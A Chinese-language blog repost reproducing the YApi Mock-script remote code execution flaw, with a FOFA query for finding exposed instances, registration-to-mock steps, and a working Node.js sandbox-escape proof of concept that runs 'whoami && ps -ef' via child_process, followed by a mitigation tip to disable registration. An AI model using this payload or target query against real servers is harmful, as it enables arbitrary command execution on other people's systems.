跟風(fēng)一波復(fù)現(xiàn)Yapi

漏洞描述：

YApi接口管理平臺(tái)遠(yuǎn)程代碼執(zhí)行0day漏洞，攻擊者可通過平臺(tái)注冊用戶添加接口，設(shè)置mock腳本從而執(zhí)行任意代碼。鑒于該漏洞目前處于0day漏洞利用狀態(tài)，強(qiáng)烈建議客戶盡快采取緩解措施以避免受此漏洞影響

fofa：

Fofa:app="YApi"

漏洞復(fù)現(xiàn)：

默認(rèn)注冊功能開啟。
注冊后創(chuàng)建項(xiàng)目：
添加接口：
創(chuàng)建接口成功：

選擇“高級Mock”，“腳本”，開啟腳本：

寫入poc并保存：

const sandbox = this const ObjectConstructor = this.constructor const FunctionConstructor = ObjectConstructor.constructor const myfun = FunctionConstructor('return process') const process = myfun() mockJson = process.mainModule.require("child_process").execSync("whoami && ps -ef").toString()

預(yù)覽：
效果：
Yapi作者已經(jīng)停止更新。臨時(shí)修復(fù)建議禁止用戶注冊，具體配置參考原文鏈接：
https://github.com/YMFE/yapi/issues/2099

看完點(diǎn)贊關(guān)注不迷路!!! 后續(xù)繼續(xù)更新優(yōu)質(zhì)安全內(nèi)容!!!

總結(jié)

以上是生活随笔為你收集整理的Yapi Mock 远程代码执行漏洞的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。